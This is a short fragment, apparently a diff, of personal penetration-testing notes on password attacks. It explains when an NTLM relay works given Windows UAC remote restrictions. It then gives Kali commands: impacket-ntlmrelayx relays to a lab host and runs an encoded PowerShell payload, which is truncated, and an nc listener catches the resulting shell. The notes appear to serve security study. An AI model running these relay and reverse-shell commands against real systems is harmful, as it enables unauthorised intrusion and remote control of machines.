KiritoLoveAsuna/Penetration-Testing/PasswordAttacks.md

 > This is used when the user in files01 is an unprivileged user but is an local administrator account on files02

 > Windows UAC will restrict any user accounts behaviour remotely other than the local administrator

+>In this example we don't use the local Administrator user for the relay attack as we did for the pass-the-hash attack.
+Therefore, the target system needs to have UAC remote restrictions disabled or the command execution will fail.
+If UAC remote restrictions are enabled on the target then we can only use the local Administrator user for the relay attack.
 ```
 kali: impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 -c "powershell -enc JABjAGwAaQBlAG4AdA...(UTF-16LE base64 encoded payload)"
 kali: nc -nvlp 8080